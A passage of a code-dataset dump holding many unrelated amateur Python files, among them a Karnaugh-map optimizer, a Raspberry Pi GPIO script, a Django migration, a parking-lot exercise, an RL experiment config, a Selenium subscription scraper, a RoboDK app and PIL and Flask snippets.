string\n\ndef slide(kmap, group, height, width):\n #Given a list of 2-indexs, see if there is a symmetric, adjacent group\n #Returns a list of all groups found\n\n if height >= rowN:\n return []\n if width >= colN:\n return []\n\n foundGroups = [group]\n\n\n\n for move in [[0,width],[0,-width],[height,0],[-height,0]]:\n valid = True\n symGroup = []\n for i in group:\n #Check in current direction, modulo\n rowCheck = (i[0]+move[0])%rowN\n colCheck = (i[1]+move[1])%colN\n \n if kmap[rowCheck][colCheck] == 0 or ([rowCheck,colCheck] in group): #Not in SOP group if 0\n valid = False\n break\n else:\n symGroup.append([rowCheck,colCheck])\n if valid:\n #Found a valid symmetric group in that direction\n foundGroups += slide(kmap,group+symGroup,height+abs(move[0]),width+abs(move[1])) #See if it can get bigger\n \n return foundGroups\n\ndef getGroups(kmap): #Gets all possible prime implicants\n posGroups = []\n\n #Start group growth from every 1\n for i in range(rowN):\n for i2 in range(colN):\n if kmap[i][i2] == 1:\n posGroups += slide(kmap, [[i,i2]], 1, 1)\n \n \n return posGroups\n\ndef getOptimalLayout(kmap): #Initialization method for optimization\n print(\"Generating groups...\")\n posGroups = getGroups(kmap)\n\n posGroups.sort()\n posGroups = list(posGroups for posGroups,_ in itertools.groupby(posGroups))\n \n posGroups = applySubsetFilter(posGroups)\n\n \n #Make every possible layout of groups, eval and return best\n print(\"Optimizing...\")\n return optimize([],posGroups,0,kmap)\n\ndef applySubsetFilter(groups): #Removes groups contained fully within other groups\n for g in [x for x in groups]:\n for g2 in [x for x in groups]:\n if not(g is g2):\n #Check for containment\n contained = True\n for e in g:\n if not(e in g2):\n contained = False\n break\n if contained:\n groups.remove(g)\n break\n return groups\n\ndef optimize(cur, opt, curCost, kmap): #Minimizes gate cost and returns best layout and cost\n if covers(cur,kmap):\n return [cur,curCost]\n \n MIN = [None,99999999]\n for o in opt:\n if not(o in cur):\n best = optimize(cur+[o],opt,getGroupCost(o)+curCost,kmap)\n if best[1] < MIN[1]:\n MIN = best\n\n return MIN\n\ndef covers(layout, kmap): #Check if a layout covers every 1\n kTruth = [[e for e in r] for r in kmap] #Copy\n for g in layout:\n for e in g:\n kTruth[e[0]][e[1]] = 0\n\n for row in kTruth: #Search for uncovered 1's\n if 1 in row:\n return False\n return True\n \n\ndef getGroupCost(g): #Return cost for group\n return int(rowN - math.log2(len(g))) #Assumes square k-map, need one for rect\n\ndef letter(i): #Number to letter\n return string.ascii_letters[i]\n \ndef printLayout(layout,kmap): #Display groups human-readable\n kCopy = [[e for e in r] for r in kmap] #Copy\n i=0\n for g in layout[0]:\n i+=1\n for p in g:\n kCopy[p[0]][p[1]] = str(kCopy[p[0]][p[1]])+letter(i)\n\n for r in kCopy:\n print([str(e) for e in r])\n print(\"Cost:\",layout[1],\"gates\")\n \ndef groupIt(kmap): #Only method the user needs to call\n global rowN, colN\n rowN = len(kmap)\n colN = len(kmap[0])\n printLayout(getOptimalLayout(kmap),kmap)\n \n \n \n\n \n","sub_path":"groupIt.py","file_name":"groupIt.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"347407914","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport atexit\nimport time\nimport RPi.GPIO as GPIO\n\n# assegurar que a função cleanup será chamada na saída do script\natexit.register(GPIO.cleanup)\n\n# usar numeração lógica dos pinos\nGPIO.setmode(GPIO.BCM)\n\nPORTAS = [17, 4, 9, 11, 7, 27, 22, 10]\n\nfor porta in PORTAS:\n GPIO.setup(porta, GPIO.OUT)\n GPIO.output(porta, 1)\n time.sleep(.5)\n","sub_path":"experiments/rpi/dojo/display7_bcm.py","file_name":"display7_bcm.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"401702466","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport django.contrib.auth.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FavoriteGenre',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', serialize=False, primary_key=True)),\n ('genre', models.CharField(max_length=80)),\n ],\n ),\n migrations.CreateModel(\n name='UserIMDB',\n fields=[\n ('user_ptr', models.OneToOneField(parent_link=True, auto_created=True, to=settings.AUTH_USER_MODEL, primary_key=True, serialize=False)),\n ('name', models.TextField()),\n ('mail', models.EmailField(max_length=254)),\n ('is_Pro', models.BooleanField()),\n ('birthday', models.DateField()),\n ('picture', models.ImageField(upload_to='')),\n ],\n options={\n 'abstract': False,\n 'verbose_name': 'user',\n 'verbose_name_plural': 'users',\n },\n bases=('auth.user',),\n managers=[\n ('objects', django.contrib.auth.models.UserManager()),\n ],\n ),\n migrations.AddField(\n model_name='favoritegenre',\n name='UserIMDB',\n field=models.ForeignKey(to='UserManager.UserIMDB'),\n ),\n ]\n","sub_path":"imdbsite/UserManager/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"331924014","text":"# import pandas as pd\n# import json\n# from argparse import ArgumentParser\nimport sys\n\n# data_object_1[color].append(reg_num)\ndata_object_1 = dict()\n# data_object_2[reg_num] = slot_num\ndata_object_2 = dict()\n# data_object_3[color].append(slot_num)\ndata_object_3 = dict()\nsize_of_the_parking = 0\noccupancy_array = list()\n\n\nclass Car:\n def __init__(self, color, reg_num):\n self.color = color\n self.reg_num = reg_num\n\n\ndef find_status():\n global occupancy_array\n print(\"{0} {1} {2} \".format(\"Slot No.\", \"Registration No\", \"Colour\"))\n for i in range(len(occupancy_array)):\n if occupancy_array[i]:\n print(\"{0} {1} {2}\".format(i+1, occupancy_array[i].reg_num, occupancy_array[i].color))\n\n\n# $ status\n# Slot No.\n# 1\n# 2\n# 3\n# 5\n# 6\n# Registration No\n# KA-01-HH-1234\n# KA-01-HH-9999\n# KA-01-BB-0001\n# KA-01-HH-2701\n# KA-01-HH-3141\n# Colour\n# White\n# White\n# Black\n# Blue\n# Black\n\n\n# $ create_parking_lot 6\n# Created a parking lot with 6 slots\ndef create_parking_lot(n):\n # print(\"creating parking lot\")\n global size_of_the_parking\n size_of_the_parking = n\n global occupancy_array\n occupancy_array = [None for _ in range(n)]\n # print(\"occupancy_array : {0}\".format(occupancy_array))\n return \"Created a parking lot with {0} slots\".format(n)\n\n\n# $ leave 4\n# Slot number 4 is free\ndef is_vehicle_present(slot_number):\n global occupancy_array\n if occupancy_array[slot_number]:\n return True\n else:\n return False\n\n\ndef leave_the_vehicle(slot_number):\n if is_vehicle_present(slot_number):\n global occupancy_array\n # occupancy_array.pop(slot_number)\n # occupancy_array.insert(slot_number, None)\n occupancy_array[slot_number-1] = None\n return \"Slot number {0} is free\".format(slot_number)\n else:\n return \"Sorry, slot_number:{0} is already occupied\".format(slot_number)\n\n\n# $ park KA-01-P-333 White\n# Allocated slot number: 4\n# $ park DL-12-AA-9999 White\n# Sorry, parking lot is full\ndef is_parking_full():\n global occupancy_array\n # print(\"inside is_parking_full : occupancy_array :{0}\".format(occupancy_array))\n for i in range(len(occupancy_array)):\n if occupancy_array[i] is None:\n # print(\"not full\")\n return False\n else:\n # print(\"parking is FULL\")\n return True\n\n\ndef find_nearest_slot_avl():\n global occupancy_array\n for i in range(len(occupancy_array)):\n if occupancy_array[i] is None:\n slot_num = i+1\n return slot_num\n\n\ndef park(reg_num, color):\n # print(\"parking vehicle number :{0} of color:{1}\".format(reg_num, color))\n if is_parking_full():\n return \"Sorry, parking lot is full\"\n else:\n c1 = Car(color, reg_num)\n # slot_num = str(find_nearest_slot_avl())\n slot_num = int(find_nearest_slot_avl())\n # data_object_1[color].append(c1.reg_num)\n reg_num_list = [reg_num]\n slot_num_list = [slot_num]\n try:\n data_object_1[color].append(reg_num)\n except KeyError:\n # print(\"1st car got parked of color: {0}\".format(color))\n data_object_1[color] = reg_num_list\n\n try:\n data_object_2[reg_num] = slot_num\n # print(\"car reg_num : {0} got parked at slot num: {1}\".format(reg_num, slot_num))\n except KeyError:\n print(\"reg number is unique so if a car with the particular reg num is\"\n \" already parked it cant be parked again untill or unless its gone out\")\n\n try:\n data_object_3[color].append(slot_num)\n except KeyError:\n data_object_3[color] = slot_num_list\n\n slot_number = find_nearest_slot_avl()\n # occupancy_array.insert(slot_number-1, c1)\n occupancy_array[slot_number - 1] = c1\n return \"Allocated slot number: {0}\".format(slot_num)\n\n\n# $ registration_numbers_for_cars_with_colour White\n# KA-01-HH-1234, KA-01-HH-9999, KA-01-P-333\ndef find_registration_numbers_for_cars_with_colour(color):\n # data_object_1 = json.dump(data_object_1.json)\n try:\n list_of_reg_num = data_object_1[color]\n return list_of_reg_num\n except KeyError:\n return \"Not found\"\n except Exception as err_msg:\n return err_msg\n\n\n# $ slot_numbers_for_cars_with_colour White\n# 1, 2, 4\n# $ slot_number_for_registration_number KA-01-HH-3141\n# 6\n# $ slot_number_for_registration_number MH-04-AY-1111\n# Not found\ndef find_slot_numbers_for_cars_with_colour(color):\n global data_object_3\n # data_object_1 = json.dump(data_object_1.json)\n try:\n list_of_reg_num = data_object_3[color]\n return list_of_reg_num\n # except KeyError:\n # return \"Not found\"\n except ValueError as err_msg:\n raise ValueError(\"problem : {0}\".format(str(err_msg)))\n\n\ndef find_slot_number_for_registration_number(reg_num):\n global data_object_3\n try:\n slot_num = data_object_2[reg_num]\n return slot_num\n except KeyError:\n return \"Not found\"\n except ValueError as err_msg:\n raise ValueError(\"problem in find_slot_number_for_registration_number: {0}\".format(str(err_msg)))\n\n\ndef display_formating_for_list(response):\n # print(\"response :{0} and type(response) : {1}\".format(response, type(response)))\n for item in response[:-1]:\n str_sol = str(item) + \", \"\n str_sol += str(response[-1])\n print(str_sol)\n\n\ndef run_as_interactive_input():\n while 1:\n cmd_str = input()\n # print(\"ur input is :{0}\".format(cmd_str))\n\n if cmd_str == \"exit\":\n # print(\"ur input is :{0}\".format(cmd_str))\n return\n\n else:\n # cmd = input().split()\n cmd_list = cmd_str.split()\n # print(\"ur input is :{0}\".format(cmd_str))\n if len(cmd_list) == 1 and cmd_list[0] == \"status\":\n # print(\"ur input is :{0}\".format(cmd_str))\n find_status()\n\n elif len(cmd_list) == 2:\n if cmd_list[0] == \"create_parking_lot\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = create_parking_lot(int(cmd_list[1]))\n print(response)\n elif cmd_list[0] == \"leave\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = leave_the_vehicle(slot_number=int(cmd_list[1]))\n print(response)\n elif cmd_list[0] == \"registration_numbers_for_cars_with_colour\":\n # print(\"ur input is :{0}\".format(cmd_list))\n response = find_registration_numbers_for_cars_with_colour(color=cmd_list[1])\n display_formating_for_list(response)\n elif cmd_list[0] == \"slot_numbers_for_cars_with_colour\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = find_slot_numbers_for_cars_with_colour(color=cmd_list[1])\n display_formating_for_list(response)\n elif cmd_list[0] == \"slot_number_for_registration_number\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = find_slot_number_for_registration_number(reg_num=cmd_list[1])\n print(response)\n\n elif len(cmd_list) == 3:\n if cmd_list[0] == \"park\":\n # print(\"ur input is :{0}\".format(cmd_str))\n # print(\"ur input is :{0}, {1}, {2}\".format(cmd_list[0], cmd_list[1], cmd_list[2]))\n response = park(reg_num=cmd_list[1], color=cmd_list[2])\n print(response)\n # park(reg_num, color)\n # park KA-01-P-333 White\n\n else:\n print(\"Enter correct command\")\n\n\ndef run_as_per_file_input(file_name):\n with open(file_name, \"r\") as f1:\n data = f1.readlines()\n\n for cmd_str in data:\n # # print(\"ur input is :{0}\".format(cmd_str))\n\n if cmd_str == \"exit\":\n # # print(\"ur input is :{0}\".format(cmd_str))\n return\n\n else:\n # cmd = input().split()\n cmd_list = cmd_str.split()\n # # print(\"ur input is :{0}\".format(cmd_str))\n if len(cmd_list) == 1 and cmd_list[0] == \"status\":\n # # print(\"ur input is :{0}\".format(cmd_str))\n find_status()\n\n elif len(cmd_list) == 2:\n if cmd_list[0] == \"create_parking_lot\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = create_parking_lot(int(cmd_list[1]))\n print(response)\n elif cmd_list[0] == \"leave\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = leave_the_vehicle(slot_number=int(cmd_list[1]))\n print(response)\n elif cmd_list[0] == \"registration_numbers_for_cars_with_colour\":\n # print(\"ur input is :{0}\".format(cmd_list))\n response = find_registration_numbers_for_cars_with_colour(color=cmd_list[1])\n display_formating_for_list(response)\n elif cmd_list[0] == \"slot_numbers_for_cars_with_colour\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = find_slot_numbers_for_cars_with_colour(color=cmd_list[1])\n display_formating_for_list(response)\n elif cmd_list[0] == \"slot_number_for_registration_number\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = find_slot_number_for_registration_number(reg_num=cmd_list[1])\n print(response)\n\n elif len(cmd_list) == 3:\n if cmd_list[0] == \"park\":\n # print(\"ur input is :{0}\".format(cmd_str))\n # print(\"ur input is :{0}, {1}, {2}\".format(cmd_list[0], cmd_list[1], cmd_list[2]))\n response = park(reg_num=cmd_list[1], color=cmd_list[2])\n print(response)\n # park(reg_num, color)\n # park KA-01-P-333 White\n\n else:\n print(\"Enter correct command\")\n\n\ndef main():\n # print(len(sys.argv))\n\n if len(sys.argv) > 1:\n # input is from file\n run_as_per_file_input(sys.argv[1])\n else:\n run_as_interactive_input()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"already_asked_questions/gojek/parking-lot-1.4.2/detailed_debug_parking_lot.py","file_name":"detailed_debug_parking_lot.py","file_ext":"py","file_size_in_byte":10487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"405453949","text":"import os\nfrom itertools import count\nimport gym\n\nfrom lagom import StepRunner\nfrom lagom.utils import pickle_dump\nfrom lagom.utils import set_global_seeds\nfrom lagom.experiment import Config\nfrom lagom.experiment import Grid\nfrom lagom.experiment import run_experiment\nfrom lagom.envs import RecordEpisodeStatistics\nfrom lagom.envs import NormalizeObservation\nfrom lagom.envs import NormalizeReward\nfrom lagom.envs import TimeStepEnv\n\nfrom baselines.vpg.agent import Agent\nfrom baselines.vpg.engine import Engine\n\n\nconfig = Config(\n {'log.freq': 10, \n 'checkpoint.num': 3,\n \n 'env.id': Grid(['HalfCheetah-v3', 'Hopper-v3', 'Walker2d-v3', 'Swimmer-v3']), \n 'env.normalize_obs': True,\n 'env.normalize_reward': True,\n \n 'nn.sizes': [64, 64],\n \n 'agent.lr': 1e-3,\n 'agent.use_lr_scheduler': False,\n 'agent.gamma': 0.99,\n 'agent.gae_lambda': 0.97,\n 'agent.standardize_adv': True, # standardize advantage estimates\n 'agent.max_grad_norm': 0.5, # grad clipping by norm\n 'agent.entropy_coef': 0.01,\n 'agent.value_coef': 0.5,\n \n # only for continuous control\n 'env.clip_action': True, # clip action within valid bound before step()\n 'agent.std0': 0.6, # initial std\n \n 'train.timestep': int(1e6), # total number of training (environmental) timesteps\n 'train.timestep_per_iter': 1000, # number of timesteps per iteration\n })\n\n\ndef make_env(config, seed, mode):\n assert mode in ['train', 'eval']\n env = gym.make(config['env.id'])\n env.seed(seed)\n env.observation_space.seed(seed)\n env.action_space.seed(seed)\n if config['env.clip_action'] and isinstance(env.action_space, gym.spaces.Box):\n env = gym.wrappers.ClipAction(env)\n if mode == 'train':\n env = RecordEpisodeStatistics(env, deque_size=100)\n if config['env.normalize_obs']:\n env = NormalizeObservation(env, clip=5.)\n if config['env.normalize_reward']:\n env = NormalizeReward(env, clip=10., gamma=config['agent.gamma'])\n env = TimeStepEnv(env)\n return env\n \n\ndef run(config, seed, device, logdir):\n set_global_seeds(seed)\n \n env = make_env(config, seed, 'train')\n agent = Agent(config, env, device)\n runner = StepRunner(reset_on_call=False)\n engine = Engine(config, agent=agent, env=env, runner=runner)\n train_logs = []\n checkpoint_count = 0\n for i in count():\n if agent.total_timestep >= config['train.timestep']:\n break\n train_logger = engine.train(i)\n train_logs.append(train_logger.logs)\n if i == 0 or (i+1) % config['log.freq'] == 0:\n train_logger.dump(keys=None, index=0, indent=0, border='-'*50)\n if agent.total_timestep >= int(config['train.timestep']*(checkpoint_count/(config['checkpoint.num'] - 1))):\n agent.checkpoint(logdir, i + 1)\n checkpoint_count += 1\n pickle_dump(obj=train_logs, f=logdir/'train_logs', ext='.pkl')\n return None\n \n\nif __name__ == '__main__':\n run_experiment(run=run, \n config=config, \n seeds=[1770966829, 1500925526, 2054191100], \n log_dir='logs/default',\n max_workers=os.cpu_count(), \n chunksize=1, \n use_gpu=False, # CPU a bit faster\n gpu_ids=None)\n","sub_path":"baselines/vpg/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"161877197","text":"from DroneDenoise.DataHandler.DataHandler import SignalsHandler\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nif __name__ == '__main__':\n window_size = 960\n sin_mask = np.hanning(window_size)\n sh = SignalsHandler('D:\\\\private_git\\\\DroneDenoise\\\\Data\\\\Extracted_Raw_Drone\\\\sides')\n signal = sh.get_signal()\n signal.add_noise()\n s_noise = signal.X[100000:100000 + window_size]\n s_clean = signal.Y[100000:100000 + window_size]\n s_noise = np.reshape(s_noise, (-1))#*sin_mask\n s_clean = np.reshape(s_clean, (-1))#*sin_mask\n\n _, ax = plt.subplots()\n ax.plot(s_noise, label='noise')\n ax.plot(s_clean, label='clean')\n plt.legend(loc='best')\n plt.grid(True)\n plt.show()\n\n\n # Number of samplepoints\n N = window_size\n # sample spacing\n T = 1.0 / 48000.0\n yf_clean = np.fft.fft(s_clean)\n yf_noise = np.fft.fft(s_noise)\n xf = np.linspace(0.0, 1.0 / (2.0 * T), N//2)\n\n _, ax = plt.subplots()\n ax.plot(xf, 2.0 / N * np.abs(yf_noise[:N//2]), label='noise')\n ax.plot(xf, 2.0 / N * np.abs(yf_clean[:N//2]), label='clean')\n plt.legend(loc='best')\n plt.show()\n\n","sub_path":"DataHandler/print_fft.py","file_name":"print_fft.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"298078982","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 8 19:33:35 2019\r\n\r\n@author: Cumali\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport random \r\nimport matplotlib.pyplot as plt\r\n\r\ndata=pd.read_csv(\"Ads_CTR_Optimisation.csv\")\r\n\r\nN=10000\r\nd=10\r\nsummary=0\r\nchoosens=[]\r\nfor n in range(0,N):\r\n ad=random.randrange(d)\r\n choosens.append(ad)\r\n reward=data.values[n,ad]#verilerdeki n. satır 1 ise ödül 1\r\n summary=summary+reward\r\n\r\nplt.hist(choosens)\r\nplt.show() ","sub_path":"Machine Learninh with Python/22randomSampling.py","file_name":"22randomSampling.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"474719975","text":"# The football.csv file contains the results from the English Premier League. \n# The columns labeled ‘Goals’ and ‘Goals Allowed’ contain the total number of \n# goals scored for and against each team in that season (so Arsenal scored 79 \n# goals against opponents, and had 36 goals scored against them). Write a\n# program to read the file, then print the name of the team with the smallest\n# difference in ‘for’ and ‘against’ goals.\n\nimport csv\n\n# open the file, convert it to first a csv reader object, then a list\nf = open('football.csv', 'r')\nr = csv.reader(f)\nl = list(r)\n\n# remove the header entry\nheader = l.pop(0)\n\n# goals are in index 5 and goals allowed are in index 6 in the original csv,\n# but let's see if we find it without prior knowledge of which rows they're\n# in\nfor col in range(len(header)):\n\tif header[col] == 'Team':\n\t\tteamname = col\n\t\tnext\n\tif header[col] == 'Goals':\n\t\tgoals = col\n\t\tnext\n\tif header[col] == 'Goals Allowed':\n\t\tgoals_allowed = col\n\n\n# makes a list of two element lists by parsing out each team name followed by \n# that team's goals-goals allowed\ngoal_diff_list = []\nfor team in l:\n\tgoal_diff_list.append( [ team[teamname], \n\t\t\t\tint(team[goals])-int(team[goals_allowed]) ] )\n\n# now to sort by goal difference (lowest goal difference should be element 0)\nsorted_goal_diff = sorted(goal_diff_list, key = lambda x: x[-1])\n\nprint(sorted_goal_diff[0][0])\n# poor Leicester, at least they got their title in the 15-16 season\n","sub_path":"python/q8_parsing.py","file_name":"q8_parsing.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"422856359","text":"import pickle\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom myPkgs.Data import *\n\nimport urllib.parse as up\n\n\nclass Scraper:\n def __init__(self):\n\n options = webdriver.ChromeOptions()\n options.add_argument('--user-data-dir=' + Path.profile)\n options.add_argument('--disable-features=InfiniteSessionRestore')\n # options.add_argument('--headless')\n\n self.driver = webdriver.Chrome(\n options=options, executable_path=Path.driver)\n\n def getPage(self, url):\n self.driver.get(url)\n\n def setSubscriptionsPage(self):\n self.driver.get(Scrap.subscriptionsPage)\n\n def wait(self):\n input(\"please any\")\n\n def getInfoFromSubScriptions(self):\n d = self.driver\n\n infoList=[]\n infoDictList=[]\n\n try:\n subscriptionsSize= WebDriverWait(scraper.driver, 60 * 15).until(\n EC.presence_of_element_located((By.XPATH, Scrap.subscriptionsSize))\n )\n finally:\n print(\"scraping start\")\n\n subscriptionsSize=subscriptionsSize.text.replace(\"(\",\"\").replace(\")\",\"\")\n subscriptionsSize=int(subscriptionsSize)\n\n subscriptions = d.find_elements_by_class_name(Scrap.titleClass)\n while subscriptionsSize!=len(subscriptions):\n d.execute_script(\"window.scrollTo(0,document.body.scrollHeight)\")\n time.sleep(3)\n subscriptions = d.find_elements_by_class_name(Scrap.titleClass)\n\n for subscription in subscriptions:\n aData = subscription.find_elements_by_tag_name(\"a\")\n aText=[aElem.text for aElem in aData]\n\n if len(aText)<4:\n continue\n\n info=Info()\n info.title=aText[1]\n info.latest=aText[2]\n info.lastRead=aText[3]\n\n # set links\n urlText=[\n up.urljoin(Scrap.baseUrl,aElem.get_attribute(\"href\"))\n for aElem in aData\n ]\n info.linkTitle=urlText[1]\n info.linkLatest=urlText[2]\n info.linkLastRead=urlText[3]\n\n\n infoDict={}\n infoDict[Const.title]=aText[1]\n infoDict[Const.latest]=aText[2]\n infoDict[Const.lastRead]=aText[3]\n\n spanData=subscription.find_elements_by_tag_name(\"span\")\n if len(spanData)<2:\n continue\n info.latestDate=spanData[1].text.replace(\"· \",\"\")\n infoDict[Const.latestDate]=spanData[1].text.replace(\"· \",\"\")\n\n\n infoConverted=self.convertInfo(info)\n infoList.append(infoConverted)\n\n infoDictConverted=self.convertInfoDict(infoDict)\n infoDictList.append(infoDictConverted)\n\n print(\"subscriptions is over\")\n\n for i in infoList:\n print(i)\n\n # save infoList to pickle\n\n with open(Path.infoList,mode=\"wb\")as f:\n pickle.dump(infoList,f)\n with open(Path.infoDictList,mode=\"wb\")as f:\n pickle.dump(infoDictList,f)\n\n\n def convertInfo(self,info:Info):\n latest=info.latest\n latest=latest.replace(\"Chapter \",\"\")\n info.latest=latest\n\n lastRead=info.lastRead\n if \"Ongoing \" in lastRead:\n info.lastRead=\"0\"\n else:\n lastRead=lastRead.replace(\"Chapter \",\"\")\n info.lastRead=lastRead\n\n return info\n\n\n def convertInfoDict(self,info:dict):\n latest=info[Const.latest]\n latest=latest.replace(\"Chapter \",\"\")\n info[Const.latest]=latest\n\n lastRead=info[Const.lastRead]\n if \"Ongoing \" in lastRead:\n info[Const.lastRead]=\"0\"\n else:\n lastRead=lastRead.replace(\"Chapter \",\"\")\n info[Const.lastRead]=lastRead\n return info\n\n # def getSubscriptionInfo(self,subscription):\n\n def close(self):\n print(\"driver is quit.\")\n self.driver.quit()\n\nif __name__ == '__main__':\n scraper = Scraper()\n scraper.setSubscriptionsPage()\n scraper.getInfoFromSubScriptions()\n scraper.close()\n","sub_path":"myPkgs/Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"77546411","text":"# --------------------------------------------\n# --------------- DESCRIPTION ----------------\n#\n# Save the 3D view point as a station parameter.\n#\n# More information about the RoboDK API for Python here:\n# https://robodk.com/doc/en/RoboDK-API.html\n# https://robodk.com/doc/en/PythonAPI/index.html\n#\n# More information on RoboDK Apps here:\n# https://github.com/RoboDK/Plug-In-Interface/tree/master/PluginAppLoader\n#\n# --------------------------------------------\n\nfrom robodk import robolink, robomath, roboapps\n\n\ndef SaveView(view_name):\n \"\"\"\n Save the 3D view point as a station parameter.\n \"\"\"\n\n # Start the RoboDK API\n RDK = robolink.Robolink()\n\n # Get the 3D view pose\n vp = RDK.ViewPose()\n\n # Convert to a string as XYZABC\n vp_str = str(robomath.Pose_2_KUKA(vp))\n\n # Save it as a station parameter (saved with the RDK file)\n RDK.setParam(view_name, vp_str)\n\n RDK.ShowMessage(\"Current view point saved: \" + vp_str, False)\n\n\ndef runmain():\n \"\"\"\n Entrypoint of this action when it is executed on its own or interacted with in RoboDK.\n Important: Use the function name 'runmain()' if you want to compile this action.\n \"\"\"\n\n if roboapps.Unchecked():\n roboapps.Exit()\n else:\n SaveView(\"Snapshot-View-0\")\n\n\nif __name__ == '__main__':\n runmain()","sub_path":"PluginAppLoader/Apps/Snapshot/SaveView.py","file_name":"SaveView.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"357564026","text":"from PIL import Image, ImageDraw, ImageFont\r\nimport os , textwrap\r\n\r\nc = 3\r\ntext1 = 'i am k.tarun naga sai eejhfsjkf sfhauefwhfusnfs fjskdhfwehpfwoiw weeof ks jsfjshfppiowfiw'\r\ntext2 = 'hisidf suifhsnfufew ewhf s fsjh fu whfb xmjsjffsk uefhuwifh nsf ufhwufsfjhksfj aueh ewp'\r\ntext3 = 'klfsfnsdo fshdfh s fjshfjaskf sfhsfhweuihewu jfsjfhjsbf jhfsjfhuefjnf cndhsgfewywb if'\r\ntext4 = 'kfjlkjsdf jnsjvyrbvdhgfhjthajs ehueksd dfhfkf jf hyre fnskj ffaeifoij if isf f sf sf j'\r\ntext5 = 'jsfkjdsfnlsdij fuefhwsksfj ncnveryisjkjf fuhqu hff sfjsjfh sfpifwf jsjf fj wi fuehfuhas n'\r\ntext6 = 'fkjjkdfnsy ifheuhfwufhj fjfj sfhrybda nds hfuew psfjafj sfheu asksknj sfweua;oewnf s iewuhe'\r\n\r\nif c==1:\r\n img = 'love1.jpg'\r\nelif c==2:\r\n hey=1\r\nelse:\r\n img = 'love2.jpg' \r\n\r\n\r\ndef love(ja):\r\n ja = 'love3.png'\r\n return\r\n\r\n\r\nim = Image.open(img)\r\nfont_type = ImageFont.truetype('BRUSHSCI.TTF', 70)\r\ndraw = ImageDraw.Draw(im)\r\n# Wrap this text.\r\nwrapper = textwrap.TextWrapper(width=75)\r\n#####################################################\r\nvalue = text1\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 300\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\nvalue = text2\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 450\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\nvalue = text3\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 600\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\nvalue = text4\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 750\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\nvalue = text5\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 900\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\nvalue = text6\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 1050\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\n\r\nim.show()\r\n\r\n\r\n","sub_path":"game/pillow.py","file_name":"pillow.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"497720655","text":"#!/usr/bin/env python\nfrom flask import Flask\nfrom admin import admin, db, login_manager\nimport conf\n\napp = Flask(__name__)\n# Function to easily find your assets\n# In your template use \napp.jinja_env.globals['static'] = (\n lambda filename: url_for('static', filename = filename)\n)\n\napp.config.from_object('conf.DEMO_FLASK_CONFIG')\nadmin.init_app(app)\ndb.init_app(app)\nlogin_manager.init_app(app)\n\nif __name__ == '__main__':\n\tapp.run(debug = True, 